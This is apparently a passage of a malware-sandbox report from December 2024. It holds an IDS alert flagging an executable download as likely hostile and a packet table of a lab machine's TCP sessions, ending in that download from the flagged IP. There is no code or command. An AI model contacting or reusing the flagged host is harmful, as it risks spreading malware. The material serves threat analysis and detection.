2024-12-26T13:01:55.035435+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.5	49743	185.215.113.16	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 26, 2024 13:01:22.231146097 CET	49675	443	192.168.2.5	23.1.237.91
Dec 26, 2024 13:01:22.231151104 CET	49674	443	192.168.2.5	23.1.237.91
Dec 26, 2024 13:01:22.340492010 CET	49673	443	192.168.2.5	23.1.237.91
Dec 26, 2024 13:01:26.645093918 CET	49704	443	192.168.2.5	23.55.153.106
Dec 26, 2024 13:01:26.645148993 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 13:01:26.645247936 CET	49704	443	192.168.2.5	23.55.153.106
Dec 26, 2024 13:01:26.646589994 CET	49704	443	192.168.2.5	23.55.153.106
Dec 26, 2024 13:01:26.646606922 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 13:01:28.141623020 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 13:01:28.141741991 CET	49704	443	192.168.2.5	23.55.153.106
Dec 26, 2024 13:01:28.145962000 CET	49704	443	192.168.2.5	23.55.153.106
Dec 26, 2024 13:01:28.145975113 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 13:01:28.146459103 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 13:01:28.199872017 CET	49704	443	192.168.2.5	23.55.153.106
Dec 26, 2024 13:01:28.201545000 CET	49704	443	192.168.2.5	23.55.153.106
Dec 26, 2024 13:01:28.247334957 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 13:01:29.100956917 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 13:01:29.100986958 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 13:01:29.100996971 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 13:01:29.101030111 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 13:01:29.101037979 CET	49704	443	192.168.2.5	23.55.153.106
Dec 26, 2024 13:01:29.101047039 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 13:01:29.101066113 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 13:01:29.101108074 CET	49704	443	192.168.2.5	23.55.153.106
Dec 26, 2024 13:01:29.101146936 CET	49704	443	192.168.2.5	23.55.153.106
Dec 26, 2024 13:01:29.212282896 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 13:01:29.212369919 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 13:01:29.212488890 CET	49704	443	192.168.2.5	23.55.153.106
Dec 26, 2024 13:01:29.212519884 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 13:01:29.212569952 CET	49704	443	192.168.2.5	23.55.153.106
Dec 26, 2024 13:01:29.242949963 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 13:01:29.243021965 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 13:01:29.243079901 CET	49704	443	192.168.2.5	23.55.153.106
Dec 26, 2024 13:01:29.243093967 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 13:01:29.243144989 CET	49704	443	192.168.2.5	23.55.153.106
Dec 26, 2024 13:01:29.243177891 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 13:01:29.243236065 CET	49704	443	192.168.2.5	23.55.153.106
Dec 26, 2024 13:01:29.255693913 CET	49704	443	192.168.2.5	23.55.153.106
Dec 26, 2024 13:01:29.255716085 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 13:01:29.255726099 CET	49704	443	192.168.2.5	23.55.153.106
Dec 26, 2024 13:01:29.255731106 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 13:01:29.417294025 CET	49705	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:29.417340040 CET	443	49705	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:29.417423964 CET	49705	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:29.417988062 CET	49705	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:29.418009996 CET	443	49705	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:30.733309984 CET	443	49705	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:30.733467102 CET	49705	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:30.736582994 CET	49705	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:30.736603022 CET	443	49705	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:30.736960888 CET	443	49705	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:30.738375902 CET	49705	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:30.738421917 CET	49705	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:30.738465071 CET	443	49705	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:31.481955051 CET	443	49705	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:31.482038021 CET	443	49705	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:31.482099056 CET	49705	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:31.493635893 CET	49705	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:31.493659019 CET	443	49705	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:31.493673086 CET	49705	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:31.493678093 CET	443	49705	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:31.840282917 CET	49706	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:31.840327978 CET	443	49706	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:31.840437889 CET	49706	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:31.840492010 CET	49674	443	192.168.2.5	23.1.237.91
Dec 26, 2024 13:01:31.840495110 CET	49675	443	192.168.2.5	23.1.237.91
Dec 26, 2024 13:01:31.841141939 CET	49706	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:31.841157913 CET	443	49706	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:31.949862957 CET	49673	443	192.168.2.5	23.1.237.91
Dec 26, 2024 13:01:33.144082069 CET	443	49706	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:33.144268036 CET	49706	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:33.145972013 CET	49706	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:33.145998955 CET	443	49706	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:33.146660089 CET	443	49706	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:33.148109913 CET	49706	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:33.148134947 CET	49706	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:33.148195028 CET	443	49706	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:33.934001923 CET	443	49706	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:33.934108973 CET	443	49706	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:33.934150934 CET	443	49706	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:33.934189081 CET	49706	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:33.934202909 CET	443	49706	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:33.934216976 CET	443	49706	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:33.934261084 CET	49706	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:33.934294939 CET	443	49706	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:33.934349060 CET	49706	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:33.942234039 CET	443	49706	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:33.950593948 CET	443	49706	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:33.950674057 CET	49706	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:33.950699091 CET	443	49706	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:33.958921909 CET	443	49706	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:33.958996058 CET	49706	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:33.959019899 CET	443	49706	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:34.012341976 CET	49706	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:34.053908110 CET	443	49706	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:34.106133938 CET	49706	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:34.144602060 CET	443	49706	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:34.148339987 CET	443	49706	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:34.148425102 CET	49706	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:34.148469925 CET	443	49706	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:34.148566961 CET	443	49706	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:34.148633003 CET	49706	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:34.183876991 CET	49706	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:34.183912039 CET	443	49706	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:34.183926105 CET	49706	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:34.183933973 CET	443	49706	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:34.433559895 CET	443	49703	23.1.237.91	192.168.2.5
Dec 26, 2024 13:01:34.433676958 CET	49703	443	192.168.2.5	23.1.237.91
Dec 26, 2024 13:01:34.897001982 CET	49707	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:34.897046089 CET	443	49707	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:34.897131920 CET	49707	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:34.897483110 CET	49707	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:34.897502899 CET	443	49707	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:36.211311102 CET	443	49707	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:36.211479902 CET	49707	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:36.215308905 CET	49707	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:36.215338945 CET	443	49707	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:36.216267109 CET	443	49707	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:36.217533112 CET	49707	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:36.217699051 CET	49707	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:36.217749119 CET	443	49707	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:37.112023115 CET	443	49707	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:37.112143993 CET	443	49707	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:37.112202883 CET	49707	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:37.112384081 CET	49707	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:37.112406969 CET	443	49707	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:37.280428886 CET	49708	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:37.280507088 CET	443	49708	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:37.280693054 CET	49708	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:37.281001091 CET	49708	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:37.281014919 CET	443	49708	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:38.601629019 CET	443	49708	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:38.601810932 CET	49708	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:38.603513002 CET	49708	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:38.603530884 CET	443	49708	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:38.604455948 CET	443	49708	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:38.605818987 CET	49708	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:38.605962992 CET	49708	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:38.605998039 CET	443	49708	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:38.606142044 CET	49708	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:38.606149912 CET	443	49708	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:39.652065039 CET	443	49708	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:39.652153015 CET	443	49708	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:39.652213097 CET	49708	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:39.652451992 CET	49708	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:39.652479887 CET	443	49708	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:39.878576040 CET	49710	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:39.878642082 CET	443	49710	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:39.878768921 CET	49710	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:39.879235029 CET	49710	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:39.879249096 CET	443	49710	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:41.185911894 CET	443	49710	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:41.186001062 CET	49710	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:41.187400103 CET	49710	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:41.187412977 CET	443	49710	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:41.187711000 CET	443	49710	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:41.188870907 CET	49710	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:41.189013004 CET	49710	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:41.189047098 CET	443	49710	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:41.193124056 CET	49710	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:41.193135977 CET	443	49710	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:42.160337925 CET	443	49710	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:42.160446882 CET	443	49710	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:42.160521984 CET	49710	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:42.160754919 CET	49710	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:42.160773993 CET	443	49710	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:43.086565018 CET	49718	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:43.086616039 CET	443	49718	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:43.086688042 CET	49718	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:43.087038040 CET	49718	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:43.087059975 CET	443	49718	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:44.393951893 CET	443	49718	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:44.394121885 CET	49718	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:44.528919935 CET	49718	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:44.528944016 CET	443	49718	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:44.529932022 CET	443	49718	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:44.537230015 CET	49718	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:44.537358046 CET	49718	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:44.537365913 CET	443	49718	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:45.312009096 CET	443	49718	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:45.312252998 CET	443	49718	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:45.312352896 CET	49718	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:45.312485933 CET	49718	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:45.312503099 CET	443	49718	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:46.027329922 CET	49725	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:46.027376890 CET	443	49725	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:46.027513027 CET	49725	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:46.028019905 CET	49725	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:46.028040886 CET	443	49725	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:47.330921888 CET	443	49725	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:47.331083059 CET	49725	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:47.418467999 CET	49725	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:47.418488979 CET	443	49725	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:47.418828964 CET	443	49725	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:47.420581102 CET	49725	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:47.421664953 CET	49725	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:47.421699047 CET	443	49725	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:47.421814919 CET	49725	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:47.421901941 CET	443	49725	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:47.421998024 CET	49725	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:47.422040939 CET	443	49725	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:47.422136068 CET	49725	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:47.422164917 CET	443	49725	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:47.422270060 CET	49725	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:47.422296047 CET	443	49725	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:47.422947884 CET	49725	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:47.422972918 CET	443	49725	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:47.422981024 CET	49725	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:47.422995090 CET	443	49725	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:47.423105001 CET	49725	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:47.423125029 CET	443	49725	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:47.423142910 CET	49725	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:47.423156977 CET	443	49725	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:47.423257113 CET	49725	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:47.423283100 CET	49725	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:47.423352957 CET	49725	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:47.467338085 CET	443	49725	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:47.469213009 CET	49725	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:47.469261885 CET	49725	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:47.469291925 CET	49725	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:47.515335083 CET	443	49725	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:47.515439034 CET	49725	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:47.559335947 CET	443	49725	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:51.095346928 CET	443	49725	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:51.095467091 CET	443	49725	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:51.095634937 CET	49725	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:51.095822096 CET	49725	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:51.095858097 CET	443	49725	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:51.130732059 CET	49737	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:51.130795956 CET	443	49737	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:51.130876064 CET	49737	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:51.131392002 CET	49737	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:51.131405115 CET	443	49737	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:52.434892893 CET	443	49737	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:52.435029984 CET	49737	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:52.440927029 CET	49737	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:52.440954924 CET	443	49737	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:52.441225052 CET	443	49737	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:52.454597950 CET	49737	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:52.454636097 CET	49737	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:52.454701900 CET	443	49737	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:53.243719101 CET	443	49737	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:53.243813992 CET	443	49737	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:53.243889093 CET	49737	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:53.316083908 CET	49737	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:53.316117048 CET	443	49737	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:53.316133022 CET	49737	443	192.168.2.5	104.21.66.86
Dec 26, 2024 13:01:53.316140890 CET	443	49737	104.21.66.86	192.168.2.5
Dec 26, 2024 13:01:53.481175900 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:53.601278067 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:53.601455927 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:53.601748943 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:53.721201897 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.035161972 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.035254955 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.035265923 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.035309076 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.035387993 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.035399914 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.035410881 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.035422087 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.035434961 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.035466909 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.035506010 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.035516024 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.035573006 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.154918909 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.154942036 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.155041933 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.159149885 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.200799942 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.245644093 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.245757103 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.245969057 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.249881983 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.250315905 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.250370026 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.258193016 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.261292934 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.261394978 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.261425972 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.269782066 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.270167112 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.270940065 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.278086901 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.278369904 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.281079054 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.286484003 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.286603928 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.286736965 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.294851065 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.294918060 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.295286894 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.303304911 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.303402901 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.305047989 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.311625957 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.311676025 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.311815977 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.320056915 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.320219040 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.320698023 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.328427076 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.328605890 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.329061985 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.371712923 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.456360102 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.456451893 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.456532001 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.458900928 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.458920002 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.458981037 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.464281082 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.464416981 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.464517117 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.469686031 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.469893932 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.469985008 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.475070000 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.475429058 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.475498915 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.480554104 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.480736017 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.481050014 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.485874891 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.486428976 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.487163067 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.491240978 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.491395950 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.491823912 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.496716022 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.497072935 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.498100996 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.502022982 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.502201080 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.502299070 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.507358074 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.507730961 CET	80	49743	185.215.113.16	192.168.2.5
